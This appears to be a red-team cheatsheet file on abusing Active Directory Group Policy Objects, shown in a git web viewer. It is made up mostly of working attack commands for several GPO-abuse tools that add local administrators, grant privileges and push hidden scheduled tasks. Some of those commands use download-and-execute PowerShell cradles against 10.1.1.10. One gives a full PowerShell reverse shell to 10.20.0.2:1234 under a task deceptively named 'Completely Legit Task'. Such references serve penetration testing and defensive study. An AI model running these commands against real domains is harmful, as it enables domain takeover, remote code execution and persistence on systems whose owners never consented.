daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

ad-adds-group-policy-objects.md (8304B)


      1 ---
      2 title: "Active Directory - Group Policy Objects"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/ad-adds-group-policy-objects.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adds-group-policy-objects.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Active Directory - Group Policy Objects
     12 
     13 > Creators of a GPO are automatically granted explicit Edit settings, delete, modify security, which manifests as CreateChild, DeleteChild, Self, WriteProperty, DeleteTree, Delete, GenericRead, WriteDacl, WriteOwner
     14 
     15 :triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
     16 
     17 GPO are stored in the DC in `\\<domain.dns>\SYSVOL\<domain.dns>\Policies\<GPOName>\`, inside two folders **User** and **Machine**.
     18 If you have the right to edit the GPO you can connect to the DC and replace the files. Planned Tasks are located at `Machine\Preferences\ScheduledTasks`.
     19 
     20 :warning: Domain members refresh group policy settings every 90 minutes with a random offset of 0 to 30 minutes but it can locally be forced with the following command: `gpupdate /force`.
     21 
     22 ## Find vulnerable GPO
     23 
     24 Look a GPLink where you have the **Write** right.
     25 
     26 ```powershell
     27 Get-DomainObjectAcl -Identity "SuperSecureGPO" -ResolveGUIDs |  Where-Object {($_.ActiveDirectoryRights.ToString() -match "GenericWrite|AllExtendedWrite|WriteDacl|WriteProperty|WriteMember|GenericAll|WriteOwner")}
     28 ```
     29 
     30 * [cogiceo/GPOHound](https://github.com/cogiceo/GPOHound) - Offensive GPO dumping and analysis tool that leverages and enriches BloodHound data.
     31 
     32 ```ps1
     33 pipx install "git+https://github.com/cogiceo/GPOHound"
     34 gpohound dump --json
     35 gpohound dump --list --gpo-name
     36 gpohound dump --guid 21246D99-1426-495B-9E8E-556ABDD81F94
     37 gpohound dump --file scripts psscripts
     38 gpohound dump --search 'VNC.*Server' --show
     39 gpohound analysis --json
     40 gpohound analysis --processed --object group registry
     41 gpohound analysis --guid CCF6CAE3-E280-4109-8F9D-25461DBB5D67 --affected
     42 gpohound analysis --computer 'SRV-PA-03.NORTH.SEVENKINGDOMS.LOCAL' --order
     43 gpohound analysis --enrich
     44 ```
     45 
     46 ## Abuse GPO with SharpGPOAbuse
     47 
     48 * [FSecureLABS/SharpGPOAbuse](https://github.com/FSecureLABS/SharpGPOAbuse) - SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.
     49 
     50 ```powershell
     51 # Build and configure SharpGPOAbuse
     52 Install-Package CommandLineParser -Version 1.9.3.15
     53 ILMerge.exe /out:C:\SharpGPOAbuse.exe C:\Release\SharpGPOAbuse.exe C:\Release\CommandLine.dll
     54 
     55 # Adding User Rights
     56 .\SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"
     57 
     58 # Adding a Local Admin
     59 .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"
     60 
     61 # Configuring a User or Computer Logon Script
     62 .\SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
     63 
     64 # Configuring a Computer or User Immediate Task
     65 # /!\ Intended to "run once" per GPO refresh, not run once per system
     66 .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
     67 .\SharpGPOAbuse.exe --AddComputerTask --GPOName "VULNERABLE_GPO" --Author 'LAB.LOCAL\User' --TaskName "EvilTask" --Arguments  "/c powershell.exe -nop -w hidden -enc BASE64_ENCODED_COMMAND " --Command "cmd.exe" --Force
     68 ```
     69 
     70 ## Abuse GPO with PowerGPOAbuse
     71 
     72 * [rootSySdk/PowerGPOAbuse](https://github.com/rootSySdk/PowerGPOAbuse) - Powershell version of SharpGPOAbuse.
     73 
     74 ```ps1
     75 PS> . .\PowerGPOAbuse.ps1
     76 
     77 # Adding a localadmin 
     78 PS> Add-LocalAdmin -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO'
     79 
     80 # Assign a new right 
     81 PS> Add-UserRights -Rights "SeLoadDriverPrivilege","SeDebugPrivilege" -Identity 'Bobby' -GPOIdentity 'SuperSecureGPO'
     82 
     83 # Adding a New Computer/User script 
     84 PS> Add-ComputerScript/Add-UserScript -ScriptName 'EvilScript' -ScriptContent $(Get-Content evil.ps1) -GPOIdentity 'SuperSecureGPO'
     85 
     86 # Create an immediate task 
     87 PS> Add-GPOImmediateTask -TaskName 'eviltask' -Command 'powershell.exe /c' -CommandArguments "'$(Get-Content evil.ps1)'" -Author Administrator -Scope Computer/User -GPOIdentity 'SuperSecureGPO'
     88 ```
     89 
     90 ## Abuse GPO with pyGPOAbuse
     91 
     92 * [Hackndo/pyGPOAbuse](https://github.com/Hackndo/pyGPOAbuse) - Partial python implementation of SharpGPOAbuse.
     93 
     94 ```powershell
     95 # Add john user to local administrators group (Password: H4x00r123..)
     96 ./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012"
     97 
     98 # Reverse shell example
     99 ./pygpoabuse.py DOMAIN/user -hashes lm:nt -gpo-id "12345677-ABCD-9876-ABCD-123456789012" \ 
    100     -powershell \ 
    101     -command "\$client = New-Object System.Net.Sockets.TCPClient('10.20.0.2',1234);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()" \ 
    102     -taskname "Completely Legit Task" \
    103     -description "Dis is legit, pliz no delete" \ 
    104     -user
    105 ```
    106 
    107 ## Abuse GPO with PowerView
    108 
    109 ```powershell
    110 # Enumerate GPO
    111 Get-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}
    112 
    113 # New-GPOImmediateTask to push an Empire stager out to machines via VulnGPO
    114 New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArguments '-NoP -NonI -W Hidden -Enc AAAAAAA...' -Force
    115 ```
    116 
    117 ## Abuse GPO with StandIn
    118 
    119 * [FuzzySecurity/StandIn](https://github.com/FuzzySecurity/StandIn) - StandIn is a small .NET35/45 AD post-exploitation toolkit.
    120 
    121 ```powershell
    122 # Add a local administrator
    123 StandIn.exe --gpo --filter Shards --localadmin user002
    124 
    125 # Set custom right to a user
    126 StandIn.exe --gpo --filter Shards --setuserrights user002 --grant "SeDebugPrivilege,SeLoadDriverPrivilege"
    127 
    128 # Execute a custom command
    129 StandIn.exe --gpo --filter Shards --tasktype computer --taskname Liber --author "REDHOOK\Administrator" --command "C:\I\do\the\thing.exe" --args "with args"
    130 ```
    131 
    132 ## Abuse GPO with GroupPolicyBackdoor
    133 
    134 * [synacktiv/GroupPolicyBackdoor](https://github.com/synacktiv/GroupPolicyBackdoor) - Group Policy Objects manipulation and exploitation framework
    135 
    136 ```ps1
    137 # Add Immediate Task to your target GPO
    138 python3 gpb.py gpo inject --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --module modules_templates/ImmediateTask_create.ini --gpo-name 'TARGET_GPO'
    139 
    140 # Clean
    141 python3 gpb.py gpo clean --domain 'corp.com' --dc 'ad01-dc.corp.com' -k --state-folder 'state_folders/2025_07_15_075047'
    142 ```
    143 
    144 **ImmediateTask_create.ini**:
    145 
    146 ```ps1
    147 [MODULECONFIG]
    148 name = Scheduled Tasks
    149 type = computer
    150 
    151 [MODULEOPTIONS]
    152 task_type = immediate
    153 program = cmd.exe
    154 arguments = /c "whoami > C:\Temp\poc.txt"
    155 
    156 [MODULEFILTERS]
    157 filters =
    158     [{
    159         "operator": "AND",
    160         "type": "Computer Name",
    161         "value": "ad01-srv1.corp.com"
    162     }]
    163 ```
    164 
    165 ## References
    166 
    167 * [A Red Teamer's Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179)
    168 * [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/)
    169 * [Abusing sAMAccountName Hijacking in "GPP: Local Users and Groups" - @toffyrak - June 12, 2025](https://www.cogiceo.com/en/whitepaper_gpphijacking/)
    170 * [GPO Abuse - Part 1 - RastaMouse - 6 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-1/)
    171 * [GPO Abuse - Part 2 - RastaMouse - 13 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-2/)
    172 * [GPO Abuse: "You can't see me" - Huy Kha -  July 19, 2019](https://pentestmag.com/gpo-abuse-you-cant-see-me/)
    173 * [Training - Attacking and Defending Active Directory Lab - Altered Security](https://www.alteredsecurity.com/adlab)